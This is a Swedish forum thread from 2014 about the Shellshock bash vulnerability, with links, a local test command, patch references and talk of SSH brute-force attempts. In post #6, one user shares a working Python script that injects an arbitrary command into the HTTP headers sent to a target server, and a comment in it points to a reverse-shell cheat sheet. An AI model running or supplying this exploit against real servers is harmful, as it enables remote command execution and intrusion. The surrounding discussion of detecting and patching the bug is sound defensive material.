• 1
  • 2
2014-09-25, 00:37
  #1
Medlem
aleph0s avatar
Flera svenska webb sidor är sårbara för den nya bash buggen.
https://news.ycombinator.com/item?id=8361574
Man sätter en header till en bash funktion så exekveras funktionen när webbservern tolkar den.
OpenSSH ska också vara sårbar.
/aleph0
Citera
2014-09-25, 01:05
  #2
Medlem
wh0r3s avatar
Finns en trevlig writeup här:
https://securityblog.redhat.com/2014...ection-attack/
Citera
2014-09-25, 01:09
  #3
Medlem
wh0r3s avatar
Citat:
Ursprungligen postat av aleph0
Flera svenska webb sidor är sårbara för den nya bash buggen.
https://news.ycombinator.com/item?id=8361574
Man sätter en header till en bash funktion så exekveras funktionen när webbservern tolkar den.
OpenSSH ska också vara sårbar.
/aleph0

"ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access."
Citera
2014-09-25, 09:30
  #4
Medlem
Testa om sidor är sårbara
http://shellshock.brandonpotter.com/
Citera
2014-09-25, 12:37
  #5
Medlem
För att se om bash är sårbart kan man köra följande kommando:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Citera
2014-09-25, 13:32
  #6
Medlem
MasterShakes avatar
Någon som kan få detta att funka?
Kod:
import urllib2, sys
#http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


def make_request_all(url, command):
	request = urllib2.Request(url)
	opener = urllib2.build_opener()
	request.add_header("User-Agent", "() { :;}; "+command)
	request.add_header("Referer", "() { :;}; "+command)
	request.add_header("Cookie", "() { :;}; "+command)
	opener.open(request)


def main():
	if len(sys.argv) != 3:
		print "usage: python "+ sys.argv[0] + " target command"
		sys.exit(1)
	make_request_all(sys.argv[1], sys.argv[2])


if __name__ == '__main__':
	main()
Citera
2014-09-25, 15:27
  #7
Medlem
Aniki-kuns avatar
Kan man inte ordna en ordentlig patch blir det bugg på bugg.

CVE-2014-7169 används mot den inte helt patchade CVE-2014-6271

http://seclists.org/oss-sec/2014/q3/685

Här finns en patch för buggen inklusive CVE-2014-7169 (yacc file patch).

http://www.circl.lu/pub/tr-27/
Citera
2014-09-25, 16:08
  #8
Medlem
en kopp kaffes avatar
Ojoj, nu var det dags igen

Finns det nagon sammastalld lista over sarbara sidor?
(jag vet att det finns en trad pa Flashback, soker en mer
komplett lista) .Vill helst undvika handla fran sidor dar
det finns potentiella bakdorrar.
Citera
2014-09-25, 19:03
  #9
Medlem
Xeliouss avatar
Citat:
Ursprungligen postat av lolgrrrrrl90
För att se om bash är sårbart kan man köra följande kommando:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

bash: varning: x: ignoring function definition attempt
bash: fel vid import av funktionsdefinition för "x"
this is a test

Undrar om buggen använts ofta...
Citera
2014-09-25, 20:18
  #10
Medlem
truperts avatar
Citat:
Ursprungligen postat av lolgrrrrrl90
För att se om bash är sårbart kan man köra följande kommando:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Citat:
Ursprungligen postat av Xelious
bash: varning: x: ignoring function definition attempt
bash: fel vid import av funktionsdefinition för "x"
this is a test

Undrar om buggen använts ofta...

På Mac OS X 10.9.4
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
Citera
2014-09-26, 11:23
  #11
Medlem
hydrols avatar
Citat:
Last failed login: Fri Sep 26 11:20:08 CEST 2014 from 61.174.51.215 on ssh:notty
There were 17616 failed login attempts since the last successful login.
Last login: Thu Sep 25 13:48:07 2014 from [mitt IP]


Pff.. lol.
Tur att
1. Vi har folk som patchar detta så fort
2. Jag har tillgång till datorn så att jag kan köra update

Inte bra att detta förekommer överhuvudtaget och att inte alla har det lika enkelt som jag.
Citera
2014-09-26, 13:09
  #12
Medlem
FuriousRages avatar
Citat:
Ursprungligen postat av hydrol
Pff.. lol.
Tur att
1. Vi har folk som patchar detta så fort
2. Jag har tillgång till datorn så att jag kan köra update

Inte bra att detta förekommer överhuvudtaget och att inte alla har det lika enkelt som jag.

Kanske dags för något som Fail2ban?
Citera
  • 1
  • 2

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in